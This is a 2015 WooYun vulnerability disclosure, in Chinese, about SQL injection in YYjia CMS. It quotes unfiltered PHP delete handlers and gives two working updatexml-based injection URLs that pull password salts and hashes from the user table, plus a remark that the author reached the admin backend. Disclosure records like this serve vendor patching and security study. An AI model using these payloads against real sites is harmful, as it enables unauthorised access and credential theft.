乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 细节已通知厂商并且等待厂商处理中 2015-02-07: 厂商已经确认,细节仅向厂商公开 2015-02-10: 细节向第三方安全合作伙伴开放 2015-04-03: 细节向核心白帽子及相关领域专家公开 2015-04-13: 细节向普通白帽子公开 2015-04-23: 细节向实习白帽子公开 2015-05-08: 细节向公众公开
YYjia cms前台过滤不严,导致注入#2
又看了看这个文件,发现还有漏洞:
elseif($caozuo=="delapp"){ $uploadid=$_GET['id']; $lx=$_GET[lx]; $sql="delete from user_data where zxid='".$uploadid."' and type='2'"; $_SGLOBAL['db']->query($sql); $sql="select * from ".tname('appinfo')." where id=$uploadid"; $appinfo=$_SGLOBAL['db']->fetch_array($_SGLOBAL['db']->query($sql)); $logofile=S_ROOT.$appinfo['logo']; if($logofile){ unlink($logofile); } if($appinfo[type]==2){ $dsql="select imgurl from androidinfo where appid='".$uploadid."'"; }elseif($appinfo[type]==1){ $dsql="select imgurl from appleinfo where appid='".$uploadid."'"; }elseif($appinfo[type]==3){ $dsql="select imgurl from wpinfo where appid='".$uploadid."'"; } $dquery=$_SGLOBAL['db']->query($dsql); $andrvalue=$_SGLOBAL['db']->fetch_array($dquery); $filepics=explode("@@@",$andrvalue[imgurl]); foreach($filepics as $dkey=>$dval){ $dval=substr($dval,19); $filepic=S_ROOT.$dval; if($filepic){ unlink($filepic); } } $sql1="delete from appinfo where id=".$uploadid; $_SGLOBAL['db']->query($sql1); if($lx=="1"){ $sql2="delete from appleinfo where appid=".$uploadid; $_SGLOBAL['db']->query($sql2); }elseif($lx=='2'){ $sql3="delete from androidinfo where appid=".$uploadid; $_SGLOBAL['db']->query($sql3); }elseif($lx=='3'){ $sql4="delete from wpinfo where appid=".$uploadid; $_SGLOBAL['db']->query($sql4); } showmessage("成功删除记录","index.php?ac=user&op=myapps"); }
白花花的一片几乎全是没有过滤的
http://192.168.218.13:805//index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23
进到后台了:
还有一处:
if($caozuo){ if($caozuo=="delcom"){ $commentid=$_GET['commentid']; if($commentid){ $sql="delete from user_data where uid='".$uid."' and type='4' and zxid=".$commentid; }else{ $sql="delete from user_data where uid='".$uid."' and type='4'"; } $aa=$_SGLOBAL['db']->query($sql); showmessage("记录删除成功",$_SERVER['HTTP_REFERER']); }
访问:
/index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23
(45app就是yyjia的演示站了):)你再不修,我还有大招放
危害等级:中
漏洞Rank:10
确认时间:2015-02-07 09:41
修复中
暂无